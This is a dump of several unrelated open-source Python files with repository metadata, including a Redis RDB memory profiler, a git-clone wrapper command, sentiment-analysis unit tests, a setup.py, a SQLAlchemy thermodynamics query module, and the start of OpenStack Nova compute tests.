self._len_largest_element = 0
if architecture == 64 or architecture == '64':
self._pointer_size = 8
elif architecture == 32 or architecture == '32':
self._pointer_size = 4
def start_rdb(self):
pass
def start_database(self, db_number):
self._dbnum = db_number
def end_database(self, db_number):
pass
def end_rdb(self):
pass
def set(self, key, value, expiry, info):
self._current_encoding = info['encoding']
size = self.sizeof_string(key) + self.sizeof_string(value) + self.top_level_object_overhead()
size += 2*self.robj_overhead()
size += self.key_expiry_overhead(expiry)
length = element_length(value)
record = MemoryRecord(self._dbnum, "string", key, size, self._current_encoding, length, length)
self._stream.next_record(record)
self.end_key()
def start_hash(self, key, length, expiry, info):
self._current_encoding = info['encoding']
self._current_length = length
size = self.sizeof_string(key)
size += 2*self.robj_overhead()
size += self.top_level_object_overhead()
size += self.key_expiry_overhead(expiry)
if 'sizeof_value' in info:
size += info['sizeof_value']
elif 'encoding' in info and info['encoding'] == 'hashtable':
size += self.hashtable_overhead(length)
else:
raise Exception('start_hash', 'Could not find encoding or sizeof_value in info object %s' % info)
self._current_size = size
def hset(self, key, field, value):
if(element_length(field) > self._len_largest_element) :
self._len_largest_element = element_length(field)
if(element_length(value) > self._len_largest_element) :
self._len_largest_element = element_length(value)
if self._current_encoding == 'hashtable':
self._current_size += self.sizeof_string(field)
self._current_size += self.sizeof_string(value)
self._current_size += self.hashtable_entry_overhead()
self._current_size += 2*self.robj_overhead()
def end_hash(self, key):
record = MemoryRecord(self._dbnum, "hash", key, self._current_size, self._current_encoding, self._current_length, self._len_largest_element)
self._stream.next_record(record)
self.end_key()
def start_set(self, key, cardinality, expiry, info):
# A set is exactly like a hashmap
self.start_hash(key, cardinality, expiry, info)
def sadd(self, key, member):
if(element_length(member) > self._len_largest_element) :
self._len_largest_element = element_length(member)
if self._current_encoding == 'hashtable':
self._current_size += self.sizeof_string(member)
self._current_size += self.hashtable_entry_overhead()
self._current_size += self.robj_overhead()
def end_set(self, key):
record = MemoryRecord(self._dbnum, "set", key, self._current_size, self._current_encoding, self._current_length, self._len_largest_element)
self._stream.next_record(record)
self.end_key()
def start_list(self, key, length, expiry, info):
self._current_length = length
self._current_encoding = info['encoding']
size = self.sizeof_string(key)
size += 2*self.robj_overhead()
size += self.top_level_object_overhead()
size += self.key_expiry_overhead(expiry)
if 'sizeof_value' in info:
size += info['sizeof_value']
elif 'encoding' in info and info['encoding'] == 'linkedlist':
size += self.linkedlist_overhead()
else:
raise Exception('start_list', 'Could not find encoding or sizeof_value in info object %s' % info)
self._current_size = size
def rpush(self, key, value) :
if(element_length(value) > self._len_largest_element) :
self._len_largest_element = element_length(value)
if self._current_encoding == 'linkedlist':
self._current_size += self.sizeof_string(value)
self._current_size += self.linkedlist_entry_overhead()
self._current_size += self.robj_overhead()
def end_list(self, key):
record = MemoryRecord(self._dbnum, "list", key, self._current_size, self._current_encoding, self._current_length, self._len_largest_element)
self._stream.next_record(record)
self.end_key()
def start_sorted_set(self, key, length, expiry, info):
self._current_length = length
self._current_encoding = info['encoding']
size = self.sizeof_string(key)
size += 2*self.robj_overhead()
size += self.top_level_object_overhead()
size += self.key_expiry_overhead(expiry)
if 'sizeof_value' in info:
size += info['sizeof_value']
elif 'encoding' in info and info['encoding'] == 'skiplist':
size += self.skiplist_overhead(length)
else:
raise Exception('start_sorted_set', 'Could not find encoding or sizeof_value in info object %s' % info)
self._current_size = size
def zadd(self, key, score, member):
if(element_length(member) > self._len_largest_element):
self._len_largest_element = element_length(member)
if self._current_encoding == 'skiplist':
self._current_size += 8 # self.sizeof_string(score)
self._current_size += self.sizeof_string(member)
self._current_size += 2*self.robj_overhead()
self._current_size += self.skiplist_entry_overhead()
def end_sorted_set(self, key):
record = MemoryRecord(self._dbnum, "sortedset", key, self._current_size, self._current_encoding, self._current_length, self._len_largest_element)
self._stream.next_record(record)
self.end_key()
def end_key(self):
self._current_encoding = None
self._current_size = 0
self._len_largest_element = 0
def sizeof_string(self, string):
# See struct sdshdr over here https://github.com/antirez/redis/blob/unstable/src/sds.h
# int len : 4 bytes
# int free : 4 bytes
# char buf[] : size will be the length of the string
# 1 extra byte is used to store the null character at the end of the string
# Redis internally stores integers as a long
# Integers less than REDIS_SHARED_INTEGERS are stored in a shared memory pool
try:
num = int(string)
if num < REDIS_SHARED_INTEGERS :
return 0
else :
return 8
except ValueError:
pass
return len(string) + 8 + 1 + self.malloc_overhead()
def top_level_object_overhead(self):
# Each top level object is an entry in a dictionary, and so we have to include
# the overhead of a dictionary entry
return self.hashtable_entry_overhead()
def key_expiry_overhead(self, expiry):
# If there is no expiry, there isn't any overhead
if not expiry:
return 0
# Key expiry is stored in a hashtable, so we have to pay for the cost of a hashtable entry
# The timestamp itself is stored as an int64, which is a 8 bytes
return self.hashtable_entry_overhead() + 8
def hashtable_overhead(self, size):
# See https://github.com/antirez/redis/blob/unstable/src/dict.h
# See the structures dict and dictht
# 2 * (3 unsigned longs + 1 pointer) + 2 ints + 2 pointers
# = 56 + 4 * sizeof_pointer()
#
# Additionally, see **table in dictht
# The length of the table is the next power of 2
# When the hashtable is rehashing, another instance of **table is created
# We are assuming 0.5 percent probability of rehashing, and so multiply
# the size of **table by 1.5
return 56 + 4*self.sizeof_pointer() + self.next_power(size)*self.sizeof_pointer()*1.5
def hashtable_entry_overhead(self):
# See https://github.com/antirez/redis/blob/unstable/src/dict.h
# Each dictEntry has 3 pointers
return 3*self.sizeof_pointer()
def linkedlist_overhead(self):
# See https://github.com/antirez/redis/blob/unstable/src/adlist.h
# A list has 5 pointers + an unsigned long
return 8 + 5*self.sizeof_pointer()
def linkedlist_entry_overhead(self):
# See https://github.com/antirez/redis/blob/unstable/src/adlist.h
# A node has 3 pointers
return 3*self.sizeof_pointer()
def skiplist_overhead(self, size):
return 2*self.sizeof_pointer() + self.hashtable_overhead(size) + (2*self.sizeof_pointer() + 16)
def skiplist_entry_overhead(self):
return self.hashtable_entry_overhead() + 2*self.sizeof_pointer() + 8 + (self.sizeof_pointer() + 8) * self.zset_random_level()
def robj_overhead(self):
return self.sizeof_pointer() + 8
def malloc_overhead(self):
return self.size_t()
def size_t(self):
return self.sizeof_pointer()
def sizeof_pointer(self):
return self._pointer_size
def next_power(self, size):
power = 1
while (power <= size) :
power = power << 1
return power
def zset_random_level(self):
level = 1
rint = random.randint(0, 0xFFFF)
while (rint < ZSKIPLIST_P * 0xFFFF):
level += 1
rint = random.randint(0, 0xFFFF)
if level < ZSKIPLIST_MAXLEVEL :
return level
else:
return ZSKIPLIST_MAXLEVEL
def element_length(element):
if isinstance(element, int):
return 8
if isinstance(element, long):
return 16
else:
return len(element)
| {
"content_hash": "a3cbf31effd877c2e6aabd5ad845441c",
"timestamp": "",
"source": "github",
"line_count": 339,
"max_line_length": 153,
"avg_line_length": 40.448377581120944,
"alnum_prop": 0.5977975495915986,
"repo_name": "svolle/redis-rdb-tools",
"id": "3ade7e32d40e8f42beac2407c2dab456f1304045",
"size": "13712",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rdbtools/memprofiler.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "88817"
}
],
"symlink_target": ""
} |
import os
import option
import utility
import grapeMenu
import grapeGit as git
import grapeConfig
class Clone(option.Option):
""" grape-clone
Clones a git repo and configures it for use with git.
Usage: grape-clone <url> <path> [--recursive] [--allNested]
Arguments:
<url> The URL of the remote repository
<path> The directory where you want to clone the repo to.
Options:
--recursive Recursively clone submodules.
--allNested Get all nested subprojects.
"""
def __init__(self):
super(Clone, self).__init__()
self._key = "clone"
self._section = "Getting Started"
#Clones the default repo into a new local repo
def description(self):
return "Clone a repo and configure it for grape"
def execute(self, args):
remotepath = args["<url>"]
destpath = args["<path>"]
rstr = "--recursive" if args["--recursive"] else ""
utility.printMsg("Cloning %s into %s %s" % (remotepath, destpath, "recursively" if args["--recursive"] else ""))
git.clone(" %s %s %s" % (rstr, remotepath, destpath))
utility.printMsg("Clone succeeded!")
os.chdir(destpath)
grapeConfig.read()
# ensure you start on a reasonable publish branch
menu = grapeMenu.menu()
config = grapeConfig.grapeConfig()
publicBranches = config.getPublicBranchList()
if publicBranches:
if "develop" in publicBranches:
initialBranch = "develop"
elif "master" in publicBranches:
initialBranch = "master"
else:
initialBranch = publicBranches[0]
menu.applyMenuChoice("checkout", args=[initialBranch])
if args["--allNested"]:
configArgs = ["--uv","--uvArg=--allNestedSubprojects"]
else:
configArgs = []
return menu.applyMenuChoice("config", configArgs)
def setDefaultConfig(self, config):
pass
| {
"content_hash": "dc1aa347eaf388b655c7946e0d462b2a",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 120,
"avg_line_length": 31.181818181818183,
"alnum_prop": 0.5889212827988338,
"repo_name": "robinson96/GRAPE",
"id": "530ebd58aea0c6b33d05245813f2f54d1c4a046b",
"size": "2058",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "vine/clone.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "5564"
},
{
"name": "Python",
"bytes": "1374602"
},
{
"name": "Shell",
"bytes": "24573"
}
],
"symlink_target": ""
} |
import sentimentFilteredTweets
import getEntities
import spacy
from spacy.en import English
import unittest
class TestUM(unittest.TestCase):
parser = English()
def setUp(self):
pass
def test_polarityscore(self):
actual_value = sentimentFilteredTweets.getPolarityScores("RT @ANI_news: Terrorists attack police party at Zadibal police station in Srinagar. More details awaited")
expected_value = {'neg': 0.385, 'neu': 0.494, 'pos': 0.121, 'compound': -0.7076}
self.assertEqual(actual_value, expected_value )
def test_polarityscore1(self):
actual_value = sentimentFilteredTweets.getPolarityScores("Congrats #RCB :) #IPL2016 #RCBvsDD #ViratKholi https://t.co/Na7G9e7Uda")
expected_value = {'neg': 0.0, 'neu': 0.439, 'pos': 0.561, 'compound': 0.7506}
self.assertEqual(actual_value, expected_value )
def test_polarityscore2(self):
actual_value = sentimentFilteredTweets.getPolarityScores("Pakistan denounces US drone attack as violation of sovereignty https://t.co/nP6A41WYKN")
expected_value = {'neg': 0.568, 'neu': 0.432, 'pos': 0.0, 'compound': -0.8481}
self.assertEqual(actual_value, expected_value )
def test_sentiment(self):
polarityscore = {'neg': 0.522, 'neu': 0.437, 'pos': 0.041, 'compound': -0.9552}
actual_value = sentimentFilteredTweets.getSentiment(polarityscore)
expected_value = 'negative'
self.assertEqual(actual_value, expected_value )
def test_sentiment1(self):
polarityscore = {'neg': 0.385, 'neu': 0.494, 'pos': 0.121, 'compound': -0.7076}
actual_value = sentimentFilteredTweets.getSentiment(polarityscore)
expected_value = 'neutral'
self.assertEqual(actual_value, expected_value )
def test_sentiment2(self):
polarityscore = {'neg': 0.0, 'neu': 0.439, 'pos': 0.561, 'compound': 0.7506}
actual_value = sentimentFilteredTweets.getSentiment(polarityscore)
expected_value = 'positive'
self.assertEqual(actual_value, expected_value )
def test_sentiment3(self):
polarityscore = {'neg': 0.568, 'neu': 0.432, 'pos': 0.0, 'compound': -0.8481}
actual_value = sentimentFilteredTweets.getSentiment(polarityscore)
expected_value = 'negative'
self.assertEqual(actual_value, expected_value )
def test_getEntities(self):
tweet = unicode('I wanna be a professional killer Like John Wick yeah')
xEntities = {}
actual_value = getEntities.getEntities(TestUM.parser,tweet,xEntities)
expected_value = {'I': 'PRP', 'Wick': 'NNP', 'John': 'NNP', 'killer': 'NN'}
self.assertEqual(actual_value,expected_value)
def test_getEntities1(self):
tweet = unicode('James Bond is extraordinary character')
xEntities = {}
actual_value = getEntities.getEntities(TestUM.parser,tweet,xEntities)
expected_value = {'James': 'NNP', 'character': 'NN', 'Bond': 'NNP'}
self.assertEqual(actual_value,expected_value)
def test_getEntities2(self):
tweet = unicode('OpenMinted will create a readable summary of licenses and a harmonized vocabulary for text miners - Penny Labropoulou')
xEntities = {}
actual_value = getEntities.getEntities(TestUM.parser,tweet,xEntities)
expected_value = {'OpenMinted': 'NNP', 'vocabulary': 'NN', 'text': 'NN', 'Penny': 'NNP', 'summary': 'NN', 'Labropoulou': 'NNP'}
self.assertEqual(actual_value,expected_value)
if __name__ == '__main__':
unittest.main() | {
"content_hash": "ea371736725be441ddfacf4a967be30f",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 166,
"avg_line_length": 42.58441558441559,
"alnum_prop": 0.7197316254955779,
"repo_name": "project-spinoza-dev/tsakpy",
"id": "b265e17ee62eface21acc32cd0f3d6cb4d1e283c",
"size": "3279",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/tsaktest.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "575"
},
{
"name": "Python",
"bytes": "9297"
}
],
"symlink_target": ""
} |
from setuptools import setup, find_packages
setup(
name='ris.clickatellhttp',
version='0.0.5',
description='Python implementation of the HTTP API for Clickatell SMS gateway',
url='https://github.com/rwizi/clickatellhttp',
license='Apache',
author='Rwizi Information Systems',
author_email='[email protected]',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: Communications',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
],
keywords='ris clickatell sms gateway',
packages=find_packages(exclude=['contrib', 'docs', 'tests*']),
)
| {
"content_hash": "aff77deae74bfc174690685ba682da1f",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 83,
"avg_line_length": 28.857142857142858,
"alnum_prop": 0.6336633663366337,
"repo_name": "rwizi/clickatellhttp",
"id": "af778218dec7c6a2a970a40a955c65779ea740b1",
"size": "808",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "9939"
}
],
"symlink_target": ""
} |
from .stage03_quantification_dG_f_postgresql_models import *
#SBaaS base
from SBaaS_base.sbaas_base import sbaas_base
from SBaaS_base.sbaas_base_query_update import sbaas_base_query_update
from SBaaS_base.sbaas_base_query_drop import sbaas_base_query_drop
from SBaaS_base.sbaas_base_query_initialize import sbaas_base_query_initialize
from SBaaS_base.sbaas_base_query_insert import sbaas_base_query_insert
from SBaaS_base.sbaas_base_query_select import sbaas_base_query_select
from SBaaS_base.sbaas_base_query_delete import sbaas_base_query_delete
from SBaaS_base.sbaas_template_query import sbaas_template_query
#other
class stage03_quantification_dG_f_query(sbaas_template_query):
def initialize_supportedTables(self):
'''Set the supported tables dict for data_stage03_quantification_dG_f
'''
tables_supported = {'data_stage03_quantification_dG0_f':data_stage03_quantification_dG0_f,
'data_stage03_quantification_dG_f':data_stage03_quantification_dG_f,
};
self.set_supportedTables(tables_supported);
## Query from data_stage03_quantification_dG0_f
# query rows from data data_stage03_quantification_dG0_f
def get_rows_dataStage03QuantificationDG0f(self):
'''Querry rows that are used'''
try:
data = self.session.query(data_stage03_quantification_dG0_f).filter(
data_stage03_quantification_dG0_f.used_.is_(True)).all();
rows_O = [];
if data:
for d in data:
row_tmp = {
'reference_id':d.reference_id,
'met_name':d.met_name,
'met_id':d.met_id,
'KEGG_ID':d.KEGG_id,
'priority':d.priority,
'dG0_f':d.dG0_f,
'dG0_f_var':d.dG0_f_var,
'dG0_f_units':d.dG0_f_units,
'temperature':d.temperature,
'temperature_units':d.temperature_units,
'ionic_strength':d.ionic_strength,
'ionic_strength_units':d.ionic_strength_units,
'pH':d.pH,
'pH_units':d.pH_units,
'used_':d.used_,
'comments_':d.comments_};
rows_O.append(row_tmp);
return rows_O;
except SQLAlchemyError as e:
print(e);
def get_rowsDict_dataStage03QuantificationDG0f(self):
'''Querry rows that are used'''
try:
data = self.session.query(data_stage03_quantification_dG0_f).filter(
data_stage03_quantification_dG0_f.used_.is_(True)).all();
rows_O = {};
if data:
for d in data:
if d.KEGG_id in rows_O:
rows_O[d.KEGG_id].append({
'reference_id':d.reference_id,
'priority':d.priority,
'dG0_f':d.dG0_f,
'dG0_f_var':d.dG0_f_var,
'dG0_f_units':d.dG0_f_units});
else:
rows_O[d.KEGG_id] = [];
rows_O[d.KEGG_id].append({
'reference_id':d.reference_id,
'priority':d.priority,
'dG0_f':d.dG0_f,
'dG0_f_var':d.dG0_f_var,
'dG0_f_units':d.dG0_f_units});
return rows_O;
except SQLAlchemyError as e:
print(e);
## Query from data_stage03_quantification_dG_f
# query rows from data_stage03_quantification_dG_f
def get_rows_experimentIDAndModelIDAndTimePointAndSampleNameAbbreviations_dataStage03QuantificationDGf(self,experiment_id_I,model_id_I,time_point_I,sample_name_abbreviation_I):
'''Query rows that are used'''
try:
data = self.session.query(data_stage03_quantification_dG_f).filter(
data_stage03_quantification_dG_f.model_id.like(model_id_I),
data_stage03_quantification_dG_f.time_point.like(time_point_I),
data_stage03_quantification_dG_f.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage03_quantification_dG_f.experiment_id.like(experiment_id_I),
data_stage03_quantification_dG_f.measured.is_(True),
data_stage03_quantification_dG_f.used_.is_(True)).all();
rows_O = [];
if data:
for d in data:
data_tmp = {'experiment_id':d.experiment_id,
'model_id':d.model_id,
'sample_name_abbreviation':d.sample_name_abbreviation,
'time_point':d.time_point,
'met_name':d.met_name,
'met_id':d.met_id,
'dG_f':d.dG_f,
'dG_f_var':d.dG_f_var,
'dG_f_units':d.dG_f_units,
'dG_f_lb':d.dG_f_lb,
'dG_f_ub':d.dG_f_ub,
'temperature':d.temperature,
'temperature_units':d.temperature_units,
'ionic_strength':d.ionic_strength,
'ionic_strength_units':d.ionic_strength_units,
'pH':d.pH,
'pH_units':d.pH_units,
'measured':d.measured,
'used_':d.used_,
'comment_':d.comment_};
rows_O.append(data_tmp);
return rows_O;
except SQLAlchemyError as e:
print(e);
def get_rowsDict_experimentIDAndModelIDAndTimePointAndSampleNameAbbreviations_dataStage03QuantificationDGf(self,experiment_id_I,model_id_I,time_point_I,sample_name_abbreviation_I):
'''Query rows that are used from the metabolomicsData'''
try:
data = self.session.query(data_stage03_quantification_dG_f).filter(
data_stage03_quantification_dG_f.model_id.like(model_id_I),
data_stage03_quantification_dG_f.time_point.like(time_point_I),
data_stage03_quantification_dG_f.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage03_quantification_dG_f.experiment_id.like(experiment_id_I),
data_stage03_quantification_dG_f.measured.is_(True),
data_stage03_quantification_dG_f.used_.is_(True)).all();
rows_O = {};
if data:
for d in data:
if d.met_id in rows_O:
print('duplicate met_ids found!');
else:
rows_O[d.met_id]={'dG_f':d.dG_f,
'dG_f_var':d.dG_f_var,
'dG_f_units':d.dG_f_units,
'dG_f_lb':d.dG_f_lb,
'dG_f_ub':d.dG_f_ub};
return rows_O;
except SQLAlchemyError as e:
print(e);
def add_dataStage03QuantificationDGf(self, data_I):
'''add rows of data_stage03_quantification_dG_f'''
if data_I:
for d in data_I:
try:
data_add = data_stage03_quantification_dG_f(d
#d['experiment_id'],
#d['model_id'],
#d['sample_name_abbreviation'],
#d['time_point'],
#d['met_name'],
#d['met_id'],
#d['dG_f'],
#d['dG_f_units'],
#d['dG_f_lb'],
#d['dG_f_ub'],
#d['temperature'],
#d['temperature_units'],
#d['ionic_strength'],
#d['ionic_strength_units'],
#d['pH'],
#d['pH_units'],
#d['measured'],
#d['used_'],
#d['comment_']
);
self.session.add(data_add);
except SQLAlchemyError as e:
print(e);
self.session.commit();
def update_dataStage03QuantificationDGf(self,data_I):
#Not yet tested
'''update rows of data_stage03_quantification_dG_f'''
if data_I:
for d in data_I:
try:
data_update = self.session.query(data_stage03_quantification_dG_f).filter(
standards.id.like(d['id'])).update(
{'experiment_id':d['experiment_id'],
'model_id':d['model_id'],
'sample_name_abbreviation':d['sample_name_abbreviation'],
'time_point':d['time_point'],
'met_name':d['met_name'],
'met_id':d['met_id'],
'dG_f':d['dG_f'],
'dG_f_units':d['dG_f_units'],
'dG_f_lb':d['dG_f_lb'],
'dG_f_ub':d['dG_f_ub'],
'temperature':d['temperature'],
'temperature_units':d['temperature_units'],
'ionic_strength':d['ionic_strength'],
'ionic_strength_units':d['ionic_strength_units'],
'pH':d['pH'],
'pH_units':d['pH_units'],
'measured':d['measured'],
'used_':d['used_'],
'comment_':d['comment_']},
synchronize_session=False);
except SQLAlchemyError as e:
print(e);
self.session.commit();
def add_dataStage03QuantificationDG0f(self, data_I):
'''add rows of data_stage03_quantification_dG0_f'''
if data_I:
#for d in data_I:
# try:
# data_add = data_stage03_quantification_dG0_f(d['reference_id'],
# d['met_name'],
# d['met_id'],
# d['KEGG_id'],
# d['priority'],
# d['dG0_f'],
# d['dG0_f_units'],
# d['temperature'],
# d['temperature_units'],
# d['ionic_strength'],
# d['ionic_strength_units'],
# d['pH'],
# d['pH_units'],
# d['used_'],
# d['comment_']);
# self.session.add(data_add);
# except SQLAlchemyError as e:
# print(e);
for k,v in data_I.items():
for d in v:
try:
data_add = data_stage03_quantification_dG0_f(d['source'],
None,
None,
k,
d['priority'],
d['dG0_f'],
d['dG0_f_var'],
d['dG0_f_units'],
298.15,
'K',
0.0,
'M',
0.0,
None,
True,
None);
self.session.add(data_add);
except SQLAlchemyError as e:
print(e);
self.session.commit();
def update_dataStage03QuantificationDG0f(self,data_I):
#Not yet tested
'''update rows of data_stage03_quantification_dG0_f'''
if data_I:
for d in data_I:
try:
data_update = self.session.query(data_stage03_quantification_dG0_f).filter(
data_stage03_quantification_dG0_f.id.like(d['id'])).update(
{'reference_id':d['reference_id'],
'met_name':d['met_name'],
'met_id':d['met_id'],
'KEGG_id':d['KEGG_id'],
'priority':d['priority'],
'dG0_f':d['dG0_f'],
'dG0_f_var':d['dG0_f_var'],
'dG0_f_units':d['dG0_f_units'],
'temperature':d['temperature'],
'temperature_units':d['temperature_units'],
'ionic_strength':d['ionic_strength'],
'ionic_strength_units':d['ionic_strength_units'],
'pH':d['pH'],
'pH_units':d['pH_units'],
'used_':d['used_'],
'comment_':d['comment_']},
synchronize_session=False);
except SQLAlchemyError as e:
print(e);
self.session.commit();
def drop_dataStage03_quantification_dG_f(self):
try:
data_stage03_quantification_dG0_f.__table__.drop(self.engine,True);
data_stage03_quantification_dG_f.__table__.drop(self.engine,True);
except SQLAlchemyError as e:
print(e);
def reset_dataStage03_quantification_dG0_f(self):
try:
reset = self.session.query(data_stage03_quantification_dG0_f).delete(synchronize_session=False);
except SQLAlchemyError as e:
print(e);
def reset_dataStage03_quantification_dG_f(self,experiment_id_I = None,simulation_id_I=None):
try:
if experiment_id_I:
reset = self.session.query(data_stage03_quantification_dG_f).filter(data_stage03_quantification_dG_f.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
else:
reset = self.session.query(data_stage03_quantification_dG_f).delete(synchronize_session=False);
self.session.commit();
except SQLAlchemyError as e:
print(e);
def initialize_dataStage03_quantification_dG_f(self):
try:
data_stage03_quantification_dG0_f.__table__.create(self.engine,True);
data_stage03_quantification_dG_f.__table__.create(self.engine,True);
except SQLAlchemyError as e:
print(e); | {
"content_hash": "02c6053ca575dbf41a57561913de212e",
"timestamp": "",
"source": "github",
"line_count": 307,
"max_line_length": 188,
"avg_line_length": 48.32247557003257,
"alnum_prop": 0.45527468823727674,
"repo_name": "dmccloskey/SBaaS_thermodynamics",
"id": "d1dbbb08448bb2d427413c5a19492a3142fe3874",
"size": "14849",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "SBaaS_thermodynamics/stage03_quantification_dG_f_query.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Matlab",
"bytes": "394"
},
{
"name": "Python",
"bytes": "369163"
}
],
"symlink_target": ""
} |
"""Tests for compute service."""
import base64
import contextlib
import copy
import datetime
import operator
import sys
import testtools
import time
import traceback
import uuid
import mock
import mox
from oslo.config import cfg
import nova
from nova import availability_zones
from nova import block_device
from nova import compute
from nova.compute import api as compute_api
from nova.compute import flavors
from nova.compute import manager as compute_manager
from nova.compute import power_state
from nova.compute import rpcapi as compute_rpcapi
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_states
from nova.conductor import manager as conductor_manager
from nova import context
from nova import db
from nova import exception
from nova.image import glance
from nova.network import api as network_api
from nova.network import model as network_model
from nova.network.security_group import openstack_driver
from nova.objects import base as obj_base
from nova.objects import instance as instance_obj
from nova.objects import migration as migration_obj
from nova.objects import quotas as quotas_obj
from nova.openstack.common.gettextutils import _
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import rpc
from nova.openstack.common.rpc import common as rpc_common
from nova.openstack.common import timeutils
from nova.openstack.common import uuidutils
from nova import policy
from nova import quota
from nova import test
from nova.tests.compute import fake_resource_tracker
from nova.tests.db import fakes as db_fakes
from nova.tests import fake_instance
from nova.tests import fake_instance_actions
from nova.tests import fake_network
from nova.tests import fake_network_cache_model
from nova.tests import fake_notifier
from nova.tests.image import fake as fake_image
from nova.tests import matchers
from nova.tests.objects import test_migration
from nova import utils
from nova.virt import event
from nova.virt import fake
from nova.volume import cinder
QUOTAS = quota.QUOTAS
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
CONF.import_opt('compute_manager', 'nova.service')
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('live_migration_retry_count', 'nova.compute.manager')
CONF.import_opt('default_ephemeral_format', 'nova.virt.driver')
FAKE_IMAGE_REF = 'fake-image-ref'
NODENAME = 'fakenode1'
def get_primitive_instance_by_uuid(context, instance_uuid):
"""
Helper method to get an instance and then convert it to
a primitive form using jsonutils.
"""
instance = db.instance_get_by_uuid(context, instance_uuid)
return jsonutils.to_primitive(instance)
def unify_instance(instance):
"""Return a dict-like instance for both object-initiated and
model-initiated sources that can reasonably be compared.
"""
newdict = dict()
for k, v in instance.iteritems():
if isinstance(v, datetime.datetime):
# NOTE(danms): DB models and Instance objects have different
# timezone expectations
v = v.replace(tzinfo=None)
elif k == 'fault':
# NOTE(danms): DB models don't have 'fault'
continue
elif k == 'pci_devices':
# NOTE(yonlig.he) pci devices need lazy loading
# fake db does not support it yet.
continue
newdict[k] = v
return newdict
class FakeSchedulerAPI(object):
def run_instance(self, ctxt, request_spec, admin_password,
injected_files, requested_networks, is_first_time,
filter_properties):
pass
def live_migration(self, ctxt, block_migration, disk_over_commit,
instance, dest):
pass
def prep_resize(self, ctxt, instance, instance_type, image, request_spec,
filter_properties, reservations):
pass
class BaseTestCase(test.TestCase):
def setUp(self):
super(BaseTestCase, self).setUp()
self.flags(compute_driver='nova.virt.fake.FakeDriver',
network_manager='nova.network.manager.FlatManager')
fake.set_nodes([NODENAME])
self.flags(use_local=True, group='conductor')
fake_notifier.stub_notifier(self.stubs)
self.addCleanup(fake_notifier.reset)
self.compute = importutils.import_object(CONF.compute_manager)
# override tracker with a version that doesn't need the database:
fake_rt = fake_resource_tracker.FakeResourceTracker(self.compute.host,
self.compute.driver, NODENAME)
self.compute._resource_tracker_dict[NODENAME] = fake_rt
def fake_get_compute_nodes_in_db(context):
fake_compute_nodes = [{'local_gb': 259,
'vcpus_used': 0,
'deleted': 0,
'hypervisor_type': 'powervm',
'created_at': '2013-04-01T00:27:06.000000',
'local_gb_used': 0,
'updated_at': '2013-04-03T00:35:41.000000',
'hypervisor_hostname': 'fake_phyp1',
'memory_mb_used': 512,
'memory_mb': 131072,
'current_workload': 0,
'vcpus': 16,
'cpu_info': 'ppc64,powervm,3940',
'running_vms': 0,
'free_disk_gb': 259,
'service_id': 7,
'hypervisor_version': 7,
'disk_available_least': 265856,
'deleted_at': None,
'free_ram_mb': 130560,
'id': 2}]
return fake_compute_nodes
def fake_compute_node_delete(context, compute_node):
self.assertEqual(compute_node.get('hypervisor_hostname'),
'fake_phyp1')
self.stubs.Set(self.compute, '_get_compute_nodes_in_db',
fake_get_compute_nodes_in_db)
self.stubs.Set(self.compute.conductor_api, 'compute_node_delete',
fake_compute_node_delete)
self.compute.update_available_resource(
context.get_admin_context())
self.user_id = 'fake'
self.project_id = 'fake'
self.context = context.RequestContext(self.user_id,
self.project_id)
def fake_show(meh, context, id):
if id:
return {'id': id, 'min_disk': None, 'min_ram': None,
'name': 'fake_name',
'status': 'active',
'properties': {'kernel_id': 'fake_kernel_id',
'ramdisk_id': 'fake_ramdisk_id',
'something_else': 'meow'}}
else:
raise exception.ImageNotFound(image_id=id)
fake_image.stub_out_image_service(self.stubs)
self.stubs.Set(fake_image._FakeImageService, 'show', fake_show)
fake_rpcapi = FakeSchedulerAPI()
self.stubs.Set(self.compute, 'scheduler_rpcapi', fake_rpcapi)
fake_network.set_stub_network_methods(self.stubs)
fake_instance_actions.stub_out_action_events(self.stubs)
def fake_get_nw_info(cls, ctxt, instance, *args, **kwargs):
self.assertTrue(ctxt.is_admin)
return fake_network.fake_get_instance_nw_info(self.stubs, 1, 1)
self.stubs.Set(network_api.API, 'get_instance_nw_info',
fake_get_nw_info)
self.stubs.Set(network_api.API, 'allocate_for_instance',
fake_get_nw_info)
self.compute_api = compute.API()
# Just to make long lines short
self.rt = self.compute._get_resource_tracker(NODENAME)
def tearDown(self):
timeutils.clear_time_override()
ctxt = context.get_admin_context()
fake_image.FakeImageService_reset()
instances = db.instance_get_all(ctxt)
for instance in instances:
db.instance_destroy(ctxt, instance['uuid'])
fake.restore_nodes()
super(BaseTestCase, self).tearDown()
def _create_fake_instance(self, params=None, type_name='m1.tiny',
services=False):
"""Create a test instance."""
if not params:
params = {}
def make_fake_sys_meta():
sys_meta = params.pop("system_metadata", {})
inst_type = flavors.get_flavor_by_name(type_name)
for key in flavors.system_metadata_flavor_props:
sys_meta['instance_type_%s' % key] = inst_type[key]
return sys_meta
inst = {}
inst['vm_state'] = vm_states.ACTIVE
inst['task_state'] = None
inst['image_ref'] = FAKE_IMAGE_REF
inst['reservation_id'] = 'r-fakeres'
